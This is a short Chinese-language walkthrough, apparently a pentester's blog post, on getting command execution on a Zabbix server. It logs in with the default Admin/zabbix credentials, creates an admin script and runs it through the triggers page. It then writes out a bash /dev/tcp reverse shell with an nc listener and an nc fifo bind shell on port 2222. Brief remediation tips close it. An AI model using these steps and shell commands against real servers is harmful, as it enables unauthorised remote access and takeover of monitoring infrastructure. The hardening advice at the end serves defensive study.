zabbix弱口令进后台导致命令执行

1. 遇到一个zabbix弱口令，这运气有点爆棚

Admin/zabbix   //话说这个zabbix可以爆破，还有的版本存在注入

2. 进后台--管理--脚本

   
   1.jpg

3. 右上角创建脚本

   
   2.jpg
4. 添加上想执行的命令，确定

5. 找到检测中--触发器--触发器状态选择任何--过滤

   
   3.jpg

6. 选择刚才创建的脚本就可以执行命令了

   
   5.jpg
7. 反弹shell

远程：bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1
本地nc指令：nc -v -l -p 自己的端口

8.或者

zabbix脚本：cat /tmp/tmp_fifo | /bin/bash -i 2>&1 | nc -l 2222 > /tmp/tmp_fifo
#上面的意思是打开一个shell，监听2222端口。
#下面我们在自己的机器上，用nc命令连接到server的shell
nc ip 2222

9. 修复漏洞
   1、很重要的一点，zabbix的登录口令一定要复杂，不要用默认口令或弱口令。
   2、zabbix的server和agent都不要以root启动，不要设置AllowRoot=1。
   3、禁止agent执行system.run，不要设置EnableRemoteCommands=1。
   4、经常打安全补丁，如果系统内核版本过低有漏洞的话，即使在zabbix用户下照样能获取root权限。